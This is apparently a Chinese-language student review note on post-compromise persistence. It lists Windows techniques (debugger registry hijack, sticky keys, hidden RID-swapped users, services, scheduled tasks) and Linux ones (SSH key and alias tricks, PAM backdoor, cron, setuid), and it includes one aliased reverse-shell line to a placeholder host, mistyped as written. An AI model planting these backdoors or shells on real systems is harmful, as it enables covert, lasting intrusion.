24_2_16知识回顾

windwos 权限维持

1. 修改注册表的辅助程序 修改对应的debugger 的值
   或者修改为运行完某个程序执行payload （我们指定的程序）
2. msf 联合 使用粘滞键运行其他程序
3. 对于注册表需要对给用户添加权限
4. msf 可以使用autorunscript
   在上线的时候就进行迁移进程
   使用-n 来指定进程的名字
5. 注册表自启动
6. 定时任务
7. 隐藏用户
   使用$ 作为结尾，然后想要该用户不在net user和控制面板里面出现就可以使用administrator 替换该用户的rid
8. 创建服务的方式

linux 权限维持

1. ssh 相关
   • 公私钥
   • 起别名的ssh 从而记录用户的输入
   • 软连接ssh
2. 起别名
   起一个多个命令复合的
   比如 alias cat=’bash -c >& /edv/tcp/ip/port 0>1&;cat’
3. pam 后门程序
   就是添加固定密码登录所有的用户
4. 定时任务
   Crontab
5. setuid setgid
   可以实现提权
   我们可以将我们自己的脚本设置为这个，然后运行这个，可以获取root 权限